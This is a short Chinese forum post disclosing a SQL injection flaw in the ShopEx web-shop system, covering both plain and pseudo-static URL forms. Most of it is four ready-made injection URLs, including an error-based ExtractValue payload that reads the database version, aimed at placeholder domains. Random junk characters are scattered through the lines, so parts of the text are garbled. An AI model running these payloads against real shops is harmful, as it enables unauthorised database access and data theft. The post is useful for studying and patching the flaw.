注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
* A/ K" h9 Q& [7 \$ x& N V: D2 U6 s( U
好吧,我扯远了~~
5 s+ c: I: N/ m其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
/ ~8 N! B4 s' d7 S不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:& i8 Q0 U4 Q8 o/ h( l, _- A6 ^
" y" |5 B5 [1 w
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html7 Y/ o& Z& W( n3 S
/ T( W7 U# p: O/ G
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html" `6 E# Q; m6 g' F' q
+ T Z4 b# o! e4 |) E4 s
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html: x, p3 z3 X, f5 R
5 E$ j. c! c5 w( i+ _; p' A, chttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
Z |, j! h( a5 u8 r6 v) w' ~! B) }! W8 r
. E) ~ Q& d9 L2 R. L) O% o" v2 r
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。: V( c: b& V3 M. {
如何注入就不多说了,10多年的东西了…不会也会了…
# \8 n A* k% K
! N1 e& Z4 e! r( O- N& o2 M' s |